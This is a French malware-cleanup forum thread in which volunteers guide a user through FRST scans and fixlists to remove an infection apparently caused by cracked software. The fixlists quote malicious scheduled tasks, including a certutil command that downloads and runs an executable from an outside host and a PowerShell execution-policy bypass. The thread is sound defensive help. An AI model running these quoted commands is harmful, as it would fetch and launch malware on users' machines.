internet explorer qui s'ouvre tout seul

Questions générales (installation, utilisation etc) sur les antivirus.

Modérateur : Mods Windows

amine1989

internet explorer qui s'ouvre tout seul

par amine1989 »

depuis ce matin internet explorer s'ouvre tt seul j'ai fais un scan avec malwarebytes mais tjrs le meme prblm , que faire svp ?
Avatar de l’utilisateur
angelique
Messages : 32263
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne

Re: internet explorer qui s'ouvre tout seul

par angelique »

Bonjour/Bonsoir,
  • Télécharge sur ton Bureau pas ailleurs FRST.EXE:



    La page de téléchargement : le tutoriel FRST ou FRST






    !! Placez le programme sur le bureau et pas ailleurs!!
  • Exécute FRST.EXE, accepte le disclaimer , Cochez tous les options et cliquez sur le bouton Scan.
    Le scan se lance, les éléments scannés apparaissent en haut.
  • Une fois le scan terminé, une popup vous le signale et deux rapports sont générés : FRST.txt et Addition.txt ( Ces deux rapports se trouvent sur le bureau avec le programme FRST. )


    Utilise le site http://pjjoint.malekal.com/ pour envoyer ton rapport, et poste le lien dans ta prochaine réponse pour analyse.
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique PDT_018 Merci.
Image
Avatar de l’utilisateur
angelique
Messages : 32263
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne

Re: internet explorer qui s'ouvre tout seul

par angelique »

Bonjour/Bonsoir
  • Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Note explicative avec des captures d'écran.




    Double-clique sur FRST.exe
    Image Sous Vista, Windows 7, 8,10, etc.... il faut lancer le fichier par clic-droit ➫ Exécuter en tant qu'administrateur

    puis sur ton clavier appuyer sur la touche CTRL + Y.

    Le bloc-note va s'ouvrir, copie/colle ceci.

    Code : Tout sélectionner

    Task: {0D746E21-CE50-4EB3-96DC-2C19D972C96B} - System32\Tasks\geektonete5a => "C:\Program Files\Internet Explorer\iexplore.exe" geekto.net/e5a <==== ATTENTION
    2017-12-15 17:27 - 2017-12-15 17:27 - 000000000 ____D C:\ProgramData\Mail.Ru
    EmptyTemp:
    
    
  • Ferme toutes les applications, y compris ton navigateur
  • Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
  • Sur le menu principal, clique une seule fois sur Corriger/Fix et patiente le temps de la correction


    Un redémarrage peut être nécessaire (pas obligatoire).
  • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse avec ton commentaire si c'est mieux !
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique PDT_018 Merci.
Image
amine1989

Re: internet explorer qui s'ouvre tout seul

par amine1989 »

voila c'est fait :) je vous donnerai des nouvelles ce soir

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 16-12-2017
Exécuté par amine (16-12-2017 16:02:12) Run:1
Exécuté depuis C:\Users\amine\Desktop
Profils chargés: amine (Profils disponibles: defaultuser0 & amine)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
Task: {0D746E21-CE50-4EB3-96DC-2C19D972C96B} - System32\Tasks\geektonete5a => "C:\Program Files\Internet Explorer\iexplore.exe" geekto.net/e5a <==== ATTENTION
2017-12-15 17:27 - 2017-12-15 17:27 - 000000000 ____D C:\ProgramData\Mail.Ru
EmptyTemp:
*****************

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D746E21-CE50-4EB3-96DC-2C19D972C96B} => impossible à supprimer clé. ErrorCode1: 0x00000002
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D746E21-CE50-4EB3-96DC-2C19D972C96B}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\geektonete5a => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\geektonete5a" => supprimé(es) avec succès
C:\ProgramData\Mail.Ru => déplacé(es) avec succès

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 19203500 B
Java, Flash, Steam htmlcache => 161533772 B
Windows/system/drivers => 363582 B
Edge => 45083733 B
Chrome => 785626058 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 161004 B
defaultuser0 => 128 B
amine => 1733331023 B

RecycleBin => 450396 B
EmptyTemp: => 2.6 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 16:02:34 ====
Avatar de l’utilisateur
angelique
Messages : 32263
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne

Re: internet explorer qui s'ouvre tout seul

par angelique »

Je pense que tu confirmeras que c'est OK, supprime alors frst.ses rapports et sa quarantaine C:\FRST
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique PDT_018 Merci.
Image
amine1989

Re: internet explorer qui s'ouvre tout seul

par amine1989 »

c bn tt est ok internet explorer ne s'ouvre plus tout seul :) merci du bon service !
amine1989

Re: internet explorer qui s'ouvre tout seul

par amine1989 »

angelique a écrit : 16 déc. 2017 17:10 Je pense que tu confirmeras que c'est OK, supprime alors frst.ses rapports et sa quarantaine C:\FRST
svp j'ai encore ce prblm .. si vous pouvez m'aider voila les deux fichiers j'ai fait le scan et tt ..

lien frst : https://pjjoint.malekal.com/files.php?i ... n1115s15q7
lien addition : https://pjjoint.malekal.com/files.php?i ... 14k12v7n13

et merci d'avance
Malekal_morte
Messages : 116318
Inscription : 10 sept. 2005 13:57

Re: [résolu]internet explorer qui s'ouvre tout seul

par Malekal_morte »

Salut,

Complètement infesté suite au téléchargement de cracks,


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CloseProcesses:
Task: {C1429DE7-2E99-4F7F-B2EB-FC3B0BC8BEA0} - System32\Tasks\MainPM => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {C81B932C-D806-47CB-8938-2892E8CE28B2} - System32\Tasks\xjliy => C:\Users\amine\AppData\Roaming\qkdgf\xjliy.vbs [2018-05-11] ()
Task: {E217AE3B-22F5-441E-A87F-0043C5BE1E57} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-11] () <==== ATTENTION
Task: {F00FF0BE-8FDC-44E1-9B16-328E7D5C2B6E} - System32\Tasks\SVC Update => C:\WINDOWS\explorer.exe "hxxp://lktoday.ru" <==== ATTENTION
Task: {F0979C31-1463-4E62-8D38-2D9C92F09BE9} - System32\Tasks\RuvZlWnxKNkmGuM2 => rundll32 "C:\Program Files (x86)\KCGHGVOnU\ISWESd.dll",#1
Task: {F8B34614-CE8C-4124-9131-D0A2C9E3B794} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\amine\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\amine\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
"{FF41608D-1F8E-42BF-932D-C0C97E391B2E}" task a été déverrouillé. <==== ATTENTION
C:\Program Files (x86)\KCGHGVOnU
C:\Windows\rss\csrss.exe
C:\Users\amine\AppData\Roaming\qkdgf
HKLM\...\RunOnce: [h50042f1w44] => C:\Program Files (x86)\Please\1388344.exe [670208 2018-05-11] ()  
 HKLM\...\RunOnce: [isch1tpo4at] => C:\Program Files (x86)\Please\7480672.exe [670208 2018-05-11] ()  
 HKLM\...\RunOnce: [mqsyilzoxhb] => C:\Program Files (x86)\Please\1219799.exe [670208 2018-05-11] ()  
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [uTorrent] => C:\Users\amine\AppData\Roaming\uTorrent\uTorrent.exe [1983672 2018-04-18] (BitTorrent Inc.)  
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [7936BASXJNGMCA9] => C:\Program Files\TZX38S3V6R\TZX38S3V6.exe [666624 2018-05-11] (XGHWLZ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [2449785] => C:\Users\amine\AppData\Roaming\14rnjvxutvr\dkwgrwm42tt.exe [541736 2018-05-11] ( ) 
HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [JXrAzZzT6'.exe] => C:\Program Files\Windows Defender\3NRR4R18DS1D7O70P0Y67\JXrAzZzT6'.exe [508416 2018-05-11] () 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [8344959] => C:\Users\amine\AppData\Roaming\3rycdj1iefo\gd2ceym33f3.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [P481IF6Y72XJRBE] => C:\Program Files\P76EZGEFUR\P76EZGEFU.exe [666624 2018-05-11] (XGHWLZ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [CYSUFLJ0ADS7CSB] => C:\Program Files (x86)\ShutdownTime\UGOWA.exe 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [3970540] => C:\Users\amine\AppData\Roaming\qzbfy4nlidp\lfhwvisiz5l.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [D8QKJ8FO52RWNV5] => C:\Program Files\2VPZCCY30S\2VPZCCY30.exe [666624 2018-05-11] (XGHWLZ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [764591] => C:\Users\amine\AppData\Roaming\yllx2f110u4\toyyy3mmetm.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [1056786] => C:\Users\amine\AppData\Roaming\i30kfx42wia\atxnncc421o.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [1145531] => C:\Users\amine\AppData\Roaming\qzofpdj31ep\kl4rhn2ehom.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [LR53S88VHR4VKCB] => C:\Program Files\9I56AIKX9B\9I56AIKX9.exe [666624 2018-05-11] (XGHWLZ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [KPIX46GBC0YKN3A] => C:\Program Files\ZPC47GYX2E\ZPC47GYX2.exe [666624 2018-05-11] (XGHWLZ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [MistyMorning] => C:\WINDOWS\rss\csrss.exe [3097600 2018-05-11] () <==== ATTENTION  
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [CloudNet] => C:\Users\amine\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-11] (EpicNet Inc.) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [456IHIIIAYVHB9Z] => C:\Program Files\4GJLQV1MNR\4GJLQV1MN.exe [666624 2018-05-11] (TMHYXY) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [1429785] => C:\Users\amine\AppData\Roaming\kxfhwwp1kzp\omlb1h0xdju.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [3041272] => C:\Users\amine\AppData\Roaming\am4lrmdiqzf\l2il0n2caun.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [415808] => C:\Users\amine\AppData\Roaming\qwfcf5farlp\qgtyao2cfki.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [XKNI0JVDF6LTZGB] => C:\Program Files\SJ3ZV9XPBS\SJ3ZV9XPB.exe [666624 2018-05-11] (TMHYXY) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [G861EVO6C0228ZK] => C:\Program Files\O8HIJQBOV4\O8HIJQBOV.exe [666624 2018-05-11] (BC) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [7846588] => C:\Users\amine\AppData\Roaming\1fdsr1oxvap\1fxddegam4n.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [L1J986HKZTONSVO] => C:\Program Files\SJKJPHGOG2\SJKJPHGOG.exe [666624 2018-05-11] (BC) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [1069445] => C:\Users\amine\AppData\Roaming\ayvs4we0cqh\rvk31hfttuu.exe [541736 2018-05-11] ( ) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\Run: [JBBJ1LS9FZ0QFZQ] => C:\Program Files\L1VJHDITYU\L1VJHDITY.exe [666624 2018-05-11] (BC) 
 HKU\S-1-5-21-2155348687-3160177937-3206478159-1001\...\RunOnce: [AwRWNQQxQn] => C:\Users\amine\AppData\Local\cypjMERAky\activation.exe [747520 2018-05-11] ()  
 Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\new.bat [2018-05-09] ()  
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-11] () [Fichier non signé] <==== ATTENTION 
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop115.exe [512312 2018-02-25] (PandaViewer)  
 S3 update64; C:\Program Files\SystemaRev\RevServicesX\updaterev.exe [594432 2018-05-09] (SystemaRev) [Fichier non signé] 
 R2 WinDefender; C:\WINDOWS\windefender.exe [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)  
 R2 WinService; C:\Users\amine\AppData\Local\XService\XService.dll [975360 2018-05-11] () [Fichier non signé] 
R1 butldsk; C:\Windows\System32\drivers\butldsk.sys [192408 2018-04-19] ()  
 R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)  
 R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)  
 R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-11] () [Fichier non signé] 
R5 cakpfbea; <==== ATTENTION: Service verrouillé 
2018-05-11 21:11 - 2018-05-11 21:12 - 000000000 ____D C:\Program Files\SJKJPHGOG2 
 2018-05-11 21:11 - 2018-05-11 21:12 - 000000000 ____D C:\Program Files\L1VJHDITYU 
 2018-05-11 21:11 - 2018-05-11 21:11 - 000000000 ____D C:\Users\amine\AppData\Roaming\ayvs4we0cqh 
 2018-05-11 21:11 - 2018-05-11 21:11 - 000000000 ____D C:\Users\amine\AppData\Roaming\1fdsr1oxvap 
 2018-05-11 21:09 - 2018-05-11 21:12 - 000000000 ____D C:\Users\amine\AppData\Roaming\q2mqckjnb13 
 2018-05-11 21:09 - 2018-05-11 21:12 - 000000000 ____D C:\Program Files\O8HIJQBOV4 
 2018-05-11 21:09 - 2018-05-11 21:09 - 000000000 ____D C:\Users\amine\AppData\LocalLow\uTorrent 
 2018-05-11 21:04 - 2018-05-11 21:06 - 000001855 _____ C:\Users\amine\Desktop\Fixlog.txt  
 2018-05-11 21:00 - 2018-05-11 21:00 - 000292400 ____H C:\Windows\system32\Drivers\vxdslguj.sys  
 2018-05-11 20:57 - 2018-05-11 20:59 - 002404864 _____ (Farbar) C:\Users\amine\Downloads\FRST64.exe  
 2018-05-11 20:57 - 2018-05-11 20:59 - 002404864 _____ (Farbar) C:\Users\amine\Desktop\FRST64.exe  
 2018-05-11 20:53 - 2018-05-11 20:53 - 000003872 _____ C:\Windows\System32\Tasks\MainPM 
 2018-05-11 20:53 - 2018-05-11 20:53 - 000003870 _____ C:\Windows\System32\Tasks\update64 
 2018-05-11 20:53 - 2018-05-11 20:53 - 000000000 ____D C:\Program Files\SystemaRev 
 2018-05-11 20:52 - 2018-05-11 20:52 - 000000000 ____D C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR 
 2018-05-11 20:52 - 2018-05-11 20:52 - 000000000 ____D C:\Program Files (x86)\SvnSzzIscGyUC 
 2018-05-11 20:52 - 2018-05-11 20:52 - 000000000 ____D C:\Program Files (x86)\NExnNAYCpUUn 
 2018-05-11 20:52 - 2018-05-11 20:52 - 000000000 ____D C:\Program Files (x86)\KCGHGVOnU 
 2018-05-11 20:52 - 2018-05-11 20:52 - 000000000 ____D C:\Program Files (x86)\JAcqddADqIE 
 2018-05-11 20:52 - 2018-05-11 20:52 - 000000000 ____D C:\Program Files (x86)\EPVqpVJyVSWU2 
 2018-05-11 20:50 - 2018-05-11 20:50 - 000016788 _____ C:\Windows\System32\Tasks\PaperCAD 
 2018-05-11 20:40 - 2018-05-11 20:52 - 000003212 _____ C:\Windows\System32\Tasks\jbDyCmJOWCzWzi 
 2018-05-11 20:40 - 2018-05-11 20:52 - 000003034 _____ C:\Windows\System32\Tasks\wAJDAAZgOBCdyQgsK2 
 2018-05-11 20:40 - 2018-05-11 20:52 - 000003026 _____ C:\Windows\System32\Tasks\TUZwhpCbnzWcBoUhWSI2 
 2018-05-11 20:40 - 2018-05-11 20:52 - 000003008 _____ C:\Windows\System32\Tasks\RuvZlWnxKNkmGuM2 
 2018-05-11 20:38 - 2018-05-11 20:38 - 000000035 _____ C:\ProgramData\config.dat  
 2018-05-11 20:37 - 2018-05-11 20:37 - 000000000 ____D C:\Users\amine\AppData\Roaming\qwfcf5farlp 
 2018-05-11 20:37 - 2018-05-11 20:37 - 000000000 ____D C:\Users\amine\AppData\Roaming\kxfhwwp1kzp 
 2018-05-11 20:37 - 2018-05-11 20:37 - 000000000 ____D C:\Users\amine\AppData\Roaming\am4lrmdiqzf 
 2018-05-11 20:37 - 2018-05-11 20:37 - 000000000 ____D C:\Program Files\SJ3ZV9XPBS 
 2018-05-11 20:37 - 2018-05-11 20:37 - 000000000 ____D C:\Program Files\4GJLQV1MNR 
 2018-05-11 18:20 - 2018-05-11 18:20 - 000000000 ____D C:\Users\amine\AppData\Roaming\mczehv5d1ud 
 2018-05-11 18:20 - 2018-05-11 18:20 - 000000000 ____D C:\Users\amine\AppData\Roaming\hizt44yks5j 
 2018-05-11 18:16 - 2018-05-11 18:16 - 000000000 ____D C:\Users\amine\AppData\Roaming\EpicNet Inc 
 2018-05-11 18:06 - 2018-05-11 18:06 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys  
 2018-05-11 18:05 - 2018-05-11 18:05 - 000000290 __RSH C:\Users\amine\ntuser.pol  
 2018-05-11 18:02 - 2018-05-11 18:06 - 008600472 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe  
 2018-05-11 18:02 - 2018-05-11 18:06 - 001209760 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe  
 2018-05-11 18:01 - 2018-05-11 21:10 - 000003606 _____ C:\Windows\System32\Tasks\ScheduledUpdate 
 2018-05-11 18:01 - 2018-05-11 21:10 - 000003270 _____ C:\Windows\System32\Tasks\csrss 
 2018-05-11 18:01 - 2018-05-11 18:01 - 000000000 ____D C:\Users\amine\AppData\Roaming\yllx2f110u4 
 2018-05-11 18:01 - 2018-05-11 18:01 - 000000000 ____D C:\Users\amine\AppData\Roaming\qzofpdj31ep 
 2018-05-11 18:01 - 2018-05-11 18:01 - 000000000 ____D C:\Users\amine\AppData\Roaming\i30kfx42wia 
 2018-05-11 18:01 - 2018-05-11 18:01 - 000000000 ____D C:\Program Files\ZPC47GYX2E 
 2018-05-11 18:01 - 2018-05-11 18:01 - 000000000 ____D C:\Program Files\9I56AIKX9B 
 2018-05-11 18:00 - 2018-05-11 18:00 - 000000000 ____D C:\Users\amine\AppData\Roaming\qzbfy4nlidp 
 2018-05-11 18:00 - 2018-05-11 18:00 - 000000000 ____D C:\Users\amine\AppData\Local\cypjMERAky 
 2018-05-11 18:00 - 2018-05-11 18:00 - 000000000 ____D C:\Program Files\2VPZCCY30S 
 2018-05-11 17:59 - 2018-05-11 18:17 - 000000000 ____D C:\Program Files (x86)\ShutdownTime 
 2018-05-11 17:59 - 2018-05-11 18:11 - 000000000 ____D C:\Program Files (x86)\foldershare 
 2018-05-11 17:59 - 2018-05-11 18:00 - 000000000 ____D C:\Program Files\P76EZGEFUR 
 2018-05-11 17:59 - 2018-05-11 17:59 - 000000000 ____D C:\Users\amine\AppData\Roaming\3rycdj1iefo 
 2018-05-11 17:57 - 2018-05-11 17:58 - 000000000 ____D C:\Users\amine\Downloads\Nouveau dossier (2) 
 2018-05-11 17:57 - 2018-03-18 21:38 - 003703415 _____ C:\Users\amine\Downloads\KMSPico 10.2.1.zip 
 2018-05-11 17:55 - 2018-05-11 21:05 - 000000000 ____D C:\Users\amine\AppData\LocalLow\Temp  
 2018-05-11 17:55 - 2018-05-11 20:52 - 000003656 _____ C:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask  
 2018-05-11 17:55 - 2018-05-11 17:55 - 000003674 _____ C:\Windows\System32\Tasks\FastDataX Task 
 2018-05-11 17:55 - 2018-05-11 17:55 - 000000000 ____D C:\Program Files\My Program 
 2018-05-11 17:55 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll  
 2018-05-11 17:54 - 2018-05-11 21:00 - 000003168 __RSH C:\ProgramData\ntuser.pol  
 2018-05-11 17:54 - 2018-05-11 20:52 - 000000000 ____D C:\Users\amine\AppData\Roaming\WidModule 
 2018-05-11 17:54 - 2018-05-11 18:07 - 000000000 ____D C:\Program Files (x86)\Multitimer 
 2018-05-11 17:54 - 2018-05-11 18:00 - 000000000 ____D C:\Program Files (x86)\Please 
 2018-05-11 17:54 - 2018-05-11 17:54 - 000000000 ____D C:\Users\amine\AppData\Roaming\FastDataX 
 2018-05-11 17:54 - 2018-05-11 17:54 - 000000000 ____D C:\Users\amine\AppData\Roaming\14rnjvxutvr 
 2018-05-11 17:54 - 2018-05-11 17:54 - 000000000 ____D C:\ProgramData\yahoochrome_D 
 2018-05-11 17:54 - 2018-05-11 17:54 - 000000000 ____D C:\Program Files\TZX38S3V6R 
 2018-05-11 17:53 - 2018-05-11 17:53 - 000000000 ____D C:\Users\amine\AppData\Roaming\Mozilla  
 2018-05-11 17:53 - 2018-05-11 17:53 - 000000000 ____D C:\Users\amine\AppData\Local\XService 
 2018-05-11 17:52 - 2018-05-11 17:52 - 007607296 _____ C:\Users\amine\AppData\Local\agent.dat  
 2018-05-11 17:52 - 2018-05-11 17:52 - 001987980 _____ C:\Users\amine\AppData\Local\Aptough.tst  
 2018-05-11 17:52 - 2018-05-11 17:52 - 001895382 _____ C:\Users\amine\AppData\Local\Airtrax.bin  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000278509 _____ C:\Users\amine\AppData\Local\Isstring.tst  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000126464 _____ C:\Users\amine\AppData\Local\noah.dat  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000070896 _____ C:\Users\amine\AppData\Local\Config.xml  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000018432 _____ C:\Users\amine\AppData\Local\Main.dat  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000015606 _____ C:\Windows\SysWOW64\findit.xml  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000005568 _____ C:\Users\amine\AppData\Local\md.xml  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000000000 ____D C:\Users\amine\AppData\Roaming\SystemHealer 
 2018-05-11 17:52 - 2018-05-11 17:52 - 000000000 ____D C:\ProgramData\Quoteexs 
 2018-05-11 17:52 - 2018-05-11 17:52 - 000000000 ____D C:\ProgramData\Logic Cramble 
 2018-05-11 17:52 - 2018-05-11 17:51 - 002136576 _____ (TODO: <Company name>) C:\Users\amine\AppData\Local\Isstring.exe  
 2018-05-11 17:52 - 2018-05-11 17:51 - 002136576 _____ (TODO: <Company name>) C:\Users\amine\AppData\Local\Aptough.exe 
 2018-05-11 17:51 - 2018-05-11 20:38 - 000929792 _____ C:\Users\amine\AppData\Local\sham.db 
 2018-05-11 17:51 - 2018-05-11 20:38 - 000016080 _____ C:\Users\amine\AppData\Local\InstallationConfiguration.xml  
 2018-05-11 17:51 - 2018-05-11 20:37 - 000001214 _____ C:\Users\amine\Desktop\Crossout - MMO action game.lnk 
 2018-05-11 17:51 - 2018-05-11 20:37 - 000001200 _____ C:\Users\amine\Desktop\Driver Updater.lnk 
 2018-05-11 17:51 - 2018-05-11 17:51 - 000140800 _____ C:\Users\amine\AppData\Local\installer.dat  
 2018-05-11 17:51 - 2018-05-11 17:51 - 000003560 _____ C:\Windows\System32\Tasks\SVC Update 
 2018-05-11 17:51 - 2018-05-11 17:51 - 000003310 _____ C:\Windows\System32\Tasks\xjliy 
 2018-05-11 17:51 - 2018-05-11 17:51 - 000000000 ____D C:\Users\Public\Documents\XMUpdate 
 2018-05-11 17:51 - 2018-05-11 17:51 - 000000000 ____D C:\Users\amine\AppData\Roaming\qkdgf 
 2018-05-11 17:51 - 2018-05-11 17:51 - 000000000 ____D C:\Program Files (x86)\KMSPico 10.2.1 Final 
 2018-05-11 17:43 - 2018-05-11 17:52 - 000075347 _____ C:\Users\amine\Downloads\Non confirmé 597000.crdownload 
2018-05-11 17:00 - 2018-05-11 17:02 - 002160502 ____N C:\Users\amine\Downloads\kmspico_v10_1_8_setup.zip 
 2018-05-11 11:17 - 2018-05-11 11:19 - 003536322 _____ C:\Users\amine\Downloads\Odin3_v3.13.1.zip 
 2018-05-11 10:56 - 2018-05-11 12:15 - 000051547 _____ C:\Users\amine\Downloads\Non confirmé 63434.crdownload 
 2018-05-11 20:38 - 2018-05-11 20:38 - 000000035 _____ () C:\ProgramData\config.dat  
 2018-05-11 17:52 - 2018-05-11 17:52 - 007607296 _____ () C:\Users\amine\AppData\Local\agent.dat  
 2018-05-11 17:52 - 2018-05-11 17:52 - 001895382 _____ () C:\Users\amine\AppData\Local\Airtrax.bin  
 2018-05-11 17:52 - 2018-05-11 17:51 - 002136576 _____ (TODO: <Company name>) C:\Users\amine\AppData\Local\Aptough.exe 
 2018-05-11 17:52 - 2018-05-11 17:52 - 001987980 _____ () C:\Users\amine\AppData\Local\Aptough.tst  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000070896 _____ () C:\Users\amine\AppData\Local\Config.xml  
 2018-05-11 17:51 - 2018-05-11 20:38 - 000016080 _____ () C:\Users\amine\AppData\Local\InstallationConfiguration.xml  
 2018-05-11 17:51 - 2018-05-11 17:51 - 000140800 _____ () C:\Users\amine\AppData\Local\installer.dat  
 2018-05-11 17:52 - 2018-05-11 17:51 - 002136576 _____ (TODO: <Company name>) C:\Users\amine\AppData\Local\Isstring.exe  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000278509 _____ () C:\Users\amine\AppData\Local\Isstring.tst  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000018432 _____ () C:\Users\amine\AppData\Local\Main.dat  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000005568 _____ () C:\Users\amine\AppData\Local\md.xml  
 2018-05-11 17:52 - 2018-05-11 17:52 - 000126464 _____ () C:\Users\amine\AppData\Local\noah.dat  
 2018-05-11 17:51 - 2018-05-11 20:38 - 000929792 _____ () C:\Users\amine\AppData\Local\sham.db 
 2018-05-11 17:52 - 2018-05-11 17:52 - 000032038 _____ () C:\Users\amine\AppData\Local\uninstall_temp.ico  
EmptyTemp:
RemoveProxy:
CreateRestorePoint:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.



2) réinitialiser les navigateurs:
==================================
Réinitialise tes navigateurs et/ou re-paramètre manuellement tes navigateurs WEB ( page de démarrage, moteur de recherche, etc ) mais aussi supprimer/désactiver les extensions inutiles/parasites.
Pour t'aider à effectuer ce ménage, clique ci-dessous sur le nom du navigateur WEB que tu utilises :
* Réinitialiser et réparer Mozilla Firefox
* Réinitialiser et réparer Google Chrome
* Réinitialiser et réparer Internet Explorer
(Ne pas utiliser Zeok)

3)
Faire un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite

4)
Refais un scan FRST et donne les nouveaux rapports via pjjoint
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
amine1989

Re: [résolu]internet explorer qui s'ouvre tout seul

par amine1989 »

frst : https://pjjoint.malekal.com/files.php?i ... 0c13q11m12
